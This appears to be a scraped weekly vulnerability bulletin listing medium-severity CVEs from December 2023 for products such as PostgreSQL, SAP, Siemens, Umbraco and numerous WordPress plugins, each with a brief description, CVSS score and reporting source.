secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
postgresql — postgresql A flaw was found in PostgreSQL involving the pg_cancel_backend role that signals background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote high privileged user to launch a denial of service (DoS) attack. 2023-12-10 4.4 CVE-2023-5870
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate information related to a registered device being monitored by WhatsUp Gold. 2023-12-14 5.9 CVE-2023-6368
security@progress.com
security@progress.com
prolion — cryptospike Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters. 2023-12-12 6.5 CVE-2023-36654
cve@mitre.org
prolion — cryptospike A SQL Injection in the users searching REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to read database data via SQL commands injected in the search parameter. 2023-12-12 4.3 CVE-2023-36652
cve@mitre.org
python — python An issue was found in CPython 3.12.0 `subprocess` module on POSIX platforms. The issue was fixed in CPython 3.12.1 and does not affect other stable releases. When using the `extra_groups=` parameter with an empty list as a value (ie `extra_groups=[]`) the logic regressed to not call `setgroups(0, NULL)` before calling `exec()`, thus not dropping the original processes’ groups before starting the new process. There is no issue when the parameter isn’t used or when any value is used besides an empty list. This issue only impacts CPython processes run with sufficient privilege to make the `setgroups` system call (typically `root`). 2023-12-08 4.9 CVE-2023-6507
cna@python.org
cna@python.org
cna@python.org
qnap — qts A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to inject malicious code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2425 build 20230609 and later QTS 5.1.0.2444 build 20230629 and later QTS 4.5.4.2467 build 20230718 and later QuTS hero h5.1.0.2424 build 20230609 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h4.5.4.2476 build 20230728 and later 2023-12-08 6.1 CVE-2023-23372
security@qnapsecurity.com.tw
qualys — private_cloud_platform A Qualys web application was found to have a stored XSS vulnerability resulting from the absence of HTML encoding in the presentation of logging information to users. This vulnerability allowed a user with login access to the application to introduce XSS payload via browser details.  2023-12-08 5.4 CVE-2023-6146
bugreport@qualys.com
redhat — advanced_cluster_security In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user’s account permissions to perform other actions. 2023-12-12 6.1 CVE-2023-4958
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
repox — repox An XSS vulnerability has been detected in Repox, which allows an attacker to compromise interactions between a user and the vulnerable application, and can be exploited by a third party by sending a specially crafted JavaScript payload to a user, and thus gain full control of their session. 2023-12-13 6.3 CVE-2023-6719
cve-coordination@incibe.es
repox — repox An XSS vulnerability stored in Repox has been identified, which allows a local attacker to store a specially crafted JavaScript payload on the server, due to the lack of proper sanitisation of field elements, allowing the attacker to trigger the malicious payload when the application loads. 2023-12-13 5.5 CVE-2023-6720
cve-coordination@incibe.es
samsung — exynos_980_firmware Samsung Mobile Processor and Wearable Processor (Exynos 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, and W920) allow Information Disclosure in the Bootloader. 2023-12-13 4.6 CVE-2023-43122
cve@mitre.org
samsung — exynos_9820_firmware A TOCTOU race condition in Samsung Mobile Processor Exynos 9820, Exynos 980, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, and Exynos 1380 can cause unexpected termination of a system. 2023-12-13 4.7 CVE-2023-42483
cve@mitre.org
samsung — exynos_9820_firmware A race condition issue discovered in Samsung Mobile Processor Exynos 9820, 980, 1080, 2100, 2200, 1280, and 1380 allows unintended modifications of values within certain areas. 2023-12-13 4.7 CVE-2023-45864
cve@mitre.org
sap — biller_direct An unauthenticated attacker can embed a hidden access to a Biller Direct URL in a frame which, when loaded by the user, will submit a cross-site scripting request to the Biller Direct system. This can result in the disclosure or modification of non-sensitive information. 2023-12-12 6.1 CVE-2023-42479
cna@sap.com
cna@sap.com
sap — businessobjects_web_intelligence SAP Business Objects Web Intelligence – version 420, allows an authenticated attacker to inject JavaScript code into Web Intelligence documents which is then executed in the victim’s browser each time the vulnerable page is visited. Successful exploitation can lead to exposure of the data that the user has access to. In the worst case, attacker could access data from reporting databases. 2023-12-12 6.8 CVE-2023-42476
cna@sap.com
cna@sap.com
sap — fiori_launchpad SAP Fiori launchpad – versions SAP_UI 750, SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, UI_700 200, SAP_BASIS 793, allows an attacker to use HTTP verb POST on read-only service causing low impact on Confidentiality of the application. 2023-12-12 4.3 CVE-2023-49584
cna@sap.com
cna@sap.com
sap — master_data_governance SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing ‘traverse to parent directory’ are passed through to the file APIs. As a result, it has a low impact to the confidentiality. 2023-12-12 5.3 CVE-2023-49058
cna@sap.com
cna@sap.com
sap — solution_manager SAP Solution Manager – version 720, allows an authorized attacker to execute certain deprecated function modules which can read or modify data of same or other component without user interaction over the network. 2023-12-12 6.4 CVE-2023-49587
cna@sap.com
cna@sap.com
sap_se — sap_gui SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability. 2023-12-12 4.1 CVE-2023-49581
cna@sap.com
cna@sap.com
sap_se — sap_hcm_(smart_paye_solution) The SAP HCM (SMART PAYE solution) – versions S4HCMCIE 100, SAP_HRCIE 600, SAP_HRCIE 604, SAP_HRCIE 608, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. After successful exploitation, an attacker can cause limited impact on confidentiality and integrity of the application. 2023-12-12 6.1 CVE-2023-49577
cna@sap.com
cna@sap.com
sas — integration_technologies SAS application is vulnerable to Reflected Cross-Site Scripting (XSS). Improper input validation in the `_program` parameter of the the `/SASStoredProcess/do` endpoint allows arbitrary JavaScript to be executed when specially crafted URL is opened by an authenticated user. The attack is possible from a low-privileged user. Only versions 9.4_M7 and 9.4_M8 were tested and confirmed to be vulnerable, status of others is unknown. For above mentioned versions hot fixes were published. 2023-12-12 5.4 CVE-2023-4932
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
schneider_electric — easy_ups_online_monitoring A CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability exists that could cause arbitrary file deletion upon service restart when accessed by a local and low-privileged attacker. 2023-12-14 5.3 CVE-2023-6407
cybersecurity@se.com
schneider_electric — trio_q-series_ethernet_data_radio A CWE-494: Download of Code Without Integrity Check vulnerability exists that could allow a privileged user to install an untrusted firmware. 2023-12-14 6.5 CVE-2023-5630
cybersecurity@se.com
seafile — seafile The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites. 2023-12-09 6.1 CVE-2023-28874
cve@mitre.org
cve@mitre.org
seafile — seafile An XSS issue in wiki and discussion pages in Seafile 9.0.6 allows attackers to inject JavaScript into the Markdown editor. 2023-12-09 5.4 CVE-2023-28873
cve@mitre.org
cve@mitre.org
semantic-mediawiki — semantic_mediawiki Special:Ask in Semantic MediaWiki before 4.0.2 allows Reflected XSS. 2023-12-10 6.1 CVE-2022-48614
cve@mitre.org
cve@mitre.org
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). A reflected cross-site scripting (XSS) vulnerability exists in the web interface of the affected applications that could allow an attacker to inject arbitrary JavaScript code. The code could be potentially executed later by another (possibly privileged) user. 2023-12-12 6.1 CVE-2023-46282
productcert@siemens.com
siemens — simatic A vulnerability has been identified in SIMATIC STEP 7 (TIA Portal) (All versions < V19). An information disclosure vulnerability could allow a local attacker to gain access to the access level password of the SIMATIC S7-1200 and S7-1500 CPUs, when entered by a legitimate user in the hardware configuration of the affected application. 2023-12-12 5.5 CVE-2022-46141
productcert@siemens.com
silicon_labs — multiple_products A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device. 2023-12-15 5.7 CVE-2023-5310
product-security@silabs.com
product-security@silabs.com
silicon_labs — z/ip_gateway_sdk The first S0 encryption key is generated with an uninitialized PRNG in Z/IP Gateway products running Silicon Labs Z/IP Gateway SDK v7.18.3 and earlier. This makes the first S0 key generated at startup predictable, potentially allowing network key prediction and unauthorized S0 network access. 2023-12-14 6.4 CVE-2023-4489
product-security@silabs.com
product-security@silabs.com
silverpeas — silverpeas Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the “Porlet Deployer” which allows administrators to deploy .WAR portlets. 2023-12-13 4.9 CVE-2023-47321
cve@mitre.org
cve@mitre.org
sissbruecker — linkding A vulnerability classified as problematic has been found in linkding 1.23.0. Affected is an unknown function. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.23.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-247338 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product. 2023-12-09 5.4 CVE-2023-6646
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
smartstar_software — cws SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can’t disrupt service or obtain sensitive information. 2023-12-15 6.5 CVE-2023-48374
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48381
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48382
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response. 2023-12-15 5.3 CVE-2023-48379
twcert@cert.org.tw
sourcecodester — online_tours_&_travels_management_system
 		 A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function prepare of the file email_setup.php. The manipulation of the argument name leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247895. 2023-12-13 5.5 CVE-2023-6765
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — simple_invoice_generator_system A vulnerability was found in SourceCodester Simple Invoice Generator System 1.0 and classified as problematic. This issue affects some unknown processing of the file login.php. The manipulation of the argument cashier leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247343. 2023-12-10 6.1 CVE-2023-6650
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — simple_student_attendance_system
 		 A vulnerability, which was classified as critical, has been found in SourceCodester Simple Student Attendance System 1.0. This issue affects the function save_attendance of the file actions.class.php. The manipulation of the argument sid leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247907. 2023-12-13 5.5 CVE-2023-6771
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — wedding_guest_e-book
 		 A vulnerability, which was classified as problematic, was found in SourceCodester Wedding Guest e-Book 1.0. This affects an unknown part of the file /endpoint/add-guest.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-247899. 2023-12-13 4.3 CVE-2023-6767
cna@vuldb.com
cna@vuldb.com
specklesystems — speckle-server Speckle Server provides server, frontend, 3D viewer, and other JavaScript utilities for the Speckle 3D data platform. A vulnerability in versions prior to 2.17.6 affects users who: authorized an application which requested a ‘token write’ scope or, using frontend-2, created a Personal Access Token (PAT) with `token write` scope. When creating a new token an agent needs to authorise the request with an existing token (the ‘requesting token’). The requesting token is required to have token write scope in order to generate new tokens. However, Speckle server was not verifying that other privileges granted to the new token were not in excess of the privileges of the requesting token. A malicious actor could use a token with only token write scope to subsequently generate further tokens with additional privileges. These privileges would only grant privileges up to the existing privileges of the user. This vulnerability cannot be used to escalate a user’s privileges or grant privileges on behalf of other users. This has been patched as of version 2.17.6. All operators of Speckle servers should upgrade their server to version 2.17.6 or higher. Any users who authorized an application with ‘token write’ scope, or created a token in frontend-2 with `token write` scope should review existing tokens and permanently revoke any they do not recognize, revoke existing tokens and create new tokens, and review usage of their account for suspicious activity. No known workarounds for this issue exist. 2023-12-14 6.5 CVE-2023-50713
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
taiwan-ca — jcicsecuritytool TAIWAN-CA(TWCA) JCICSecurityTool’s Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack. 2023-12-15 6.1 CVE-2023-48387
twcert@cert.org.tw
thecosy — icecms A vulnerability was found in Thecosy IceCMS 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /adplanet/PlanetUser of the component API. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247885 was assigned to this vulnerability. 2023-12-13 6.5 CVE-2023-6757
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
thecosy — icecms A vulnerability classified as critical was found in Thecosy IceCMS up to 2.0.1. This vulnerability affects unknown code. The manipulation leads to manage user sessions. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247888. 2023-12-13 5.4 CVE-2023-6760
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
thecosy — icecms A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /adplanet/PlanetCommentList of the component API. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247886 is the identifier assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6758
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
thecosy — icecms A vulnerability, which was classified as critical, was found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /article/DelectArticleById/ of the component Article Handler. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-247890 is the identifier assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6762
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda — oa_2017 A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-16 5.5 CVE-2023-6885
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
typecho — typecho A vulnerability, which was classified as problematic, has been found in Typecho 1.2.1. Affected by this issue is some unknown functionality of the file /admin/manage-users.php. The manipulation of the argument page leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-247250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 5.3 CVE-2023-6615
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
typecho — typecho A vulnerability classified as problematic has been found in Typecho 1.2.1. Affected is an unknown function of the file /admin/options-theme.php of the component Logo Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 4.8 CVE-2023-6613
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Clockworks applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49342
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Dropby applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49343
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Window Shuffler applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49344
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Takeabreak applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49345
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras WeatherShow applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. 2023-12-14 6 CVE-2023-49346
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
ubuntu_budgie — budgie_extras Temporary data passed between application components by Budgie Extras Windows Previews could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may read private information from windows, present false information to users, or deny access to the application. 2023-12-14 6 CVE-2023-49347
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in 10.0.0 and prior to versions 10.8.1 and 12.3.4, Umbraco contains a cross-site scripting (XSS) vulnerability enabling attackers to bring malicious content into a website or application. Versions 10.8.1 and 12.3.4 contain a patch for this issue. 2023-12-12 6.1 CVE-2023-48313
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.0, Backoffice users with permissions to create packages can use path traversal and thereby write outside of the expected location. Versions 8.18.10, 10.8.1, and 12.3.0 contain a patch for this issue. 2023-12-12 6.5 CVE-2023-49089
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, users with low privileges (Editor, etc.) are able to access some unintended endpoints. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue. 2023-12-12 5.4 CVE-2023-49273
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a user enumeration attack is possible when SMTP is not set up correctly, but reset password is enabled. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue. 2023-12-12 5.3 CVE-2023-49274
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a brute force exploit can be used to collect valid usernames. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue. 2023-12-12 5.3 CVE-2023-49278
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 7.0.0 and prior to versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0, a user with access to the backoffice can upload SVG files that include scripts. If the user can trick another user to load the media directly in a browser, the scripts can be executed. Versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0 contain a patch for this issue. Some workarounds are available. Implement the server side file validation or serve all media from an different host (e.g cdn) than where Umbraco is hosted. 2023-12-12 5.4 CVE-2023-49279
security-advisories@github.com
security-advisories@github.com
umbraco — umbraco_cms Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.3.0, Backoffice users with send for approval permission but not publish permission are able to publish in some scenarios. Versions 8.18.10, 10.7.0, and 12.3.0 contains a patch for this issue. No known workarounds are available. 2023-12-12 4.3 CVE-2023-48227
security-advisories@github.com
voltronicpower — snmp_web_pro Cross Site Scripting (XSS) in Voltronic Power SNMP Web Pro v.1.1 allows an attacker to execute arbitrary code via a crafted script within a request to the webserver. 2023-12-12 6.1 CVE-2023-49563
cve@mitre.org
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Till Krüss Email Address Encoder allows Stored XSS.This issue affects Email Address Encoder: from n/a through 1.0.22. 2023-12-15 6.5 CVE-2023-48765
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Nima Saberi Aparat allows Stored XSS.This issue affects Aparat: from n/a through 1.7.1. 2023-12-14 6.5 CVE-2023-48770
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in EnigmaWeb WP Catalogue allows Stored XSS.This issue affects WP Catalogue: from n/a through 1.7.6. 2023-12-14 6.5 CVE-2023-48780
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS.This issue affects Currency Converter Calculator: from n/a through 1.3.1. 2023-12-14 6.5 CVE-2023-49149
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CurrencyRate.Today Crypto Converter Widget allows Stored XSS.This issue affects Crypto Converter Widget: from n/a through 1.8.1. 2023-12-14 6.5 CVE-2023-49150
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Simple Calendar Simple Calendar – Google Calendar Plugin allows Stored XSS.This issue affects Simple Calendar – Google Calendar Plugin: from n/a through 3.2.6. 2023-12-14 6.5 CVE-2023-49151
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Labs64 Credit Tracker allows Stored XSS.This issue affects Credit Tracker: from n/a through 1.1.17. 2023-12-14 6.5 CVE-2023-49152
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in formzu Inc. Formzu WP allows Stored XSS.This issue affects Formzu WP: from n/a through 1.6.6. 2023-12-15 6.5 CVE-2023-49160
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WordPlus Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss allows Stored XSS.This issue affects Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss: from n/a through 2.4.0. 2023-12-14 6.5 CVE-2023-49168
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. 2023-12-15 6.5 CVE-2023-49169
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in 10to8 Sign In Scheduling Online Appointment Booking System allows Stored XSS.This issue affects Sign In Scheduling Online Appointment Booking System: from n/a through 1.0.9. 2023-12-14 6.5 CVE-2023-49173
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS.This issue affects Event post: from n/a through 5.8.6. 2023-12-15 6.5 CVE-2023-49179
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spiffy Plugins Spiffy Calendar allows Stored XSS.This issue affects Spiffy Calendar: from n/a through 4.9.5. 2023-12-14 6.5 CVE-2023-49745
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3. 2023-12-14 6.5 CVE-2023-49820
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BoldThemes Bold Page Builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through 4.6.1. 2023-12-15 6.5 CVE-2023-49823
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo allows Stored XSS.This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 6.4.2. 2023-12-14 6.5 CVE-2023-49828
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brainstorm Force Spectra – WordPress Gutenberg Blocks allows Stored XSS.This issue affects Spectra – WordPress Gutenberg Blocks: from n/a through 2.7.9. 2023-12-14 6.5 CVE-2023-49833
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Paul Bearne Author Avatars List/Block allows Stored XSS.This issue affects Author Avatars List/Block: from n/a through 2.1.17. 2023-12-14 6.5 CVE-2023-49846
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Twinpictures Annual Archive allows Stored XSS.This issue affects Annual Archive: from n/a through 1.6.0. 2023-12-14 6.5 CVE-2023-49847
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in weDevs WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts allows Stored XSS.This issue affects WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts: from n/a through 2.6.7. 2023-12-14 6.5 CVE-2023-49860
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Averta Shortcodes and extra features for Phlox theme allows Stored XSS.This issue affects Shortcodes and extra features for Phlox theme: from n/a through 2.15.2. 2023-12-14 6.5 CVE-2023-50368
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Alma Alma – Pay in installments or later for WooCommerce allows Stored XSS.This issue affects Alma – Pay in installments or later for WooCommerce: from n/a through 5.1.3. 2023-12-14 6.5 CVE-2023-50369
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Livemesh WPBakery Page Builder Addons by Livemesh allows Stored XSS.This issue affects WPBakery Page Builder Addons by Livemesh: from n/a through 3.5. 2023-12-14 6.5 CVE-2023-50370
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress allows Stored XSS.This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 8.0.6. 2023-12-14 6.5 CVE-2023-50371
audit@patchstack.com
wordpress — wordpress The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2023-12-11 6.1 CVE-2023-5749
contact@wpscan.com
wordpress — wordpress The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2023-12-11 6.1 CVE-2023-5750
contact@wpscan.com
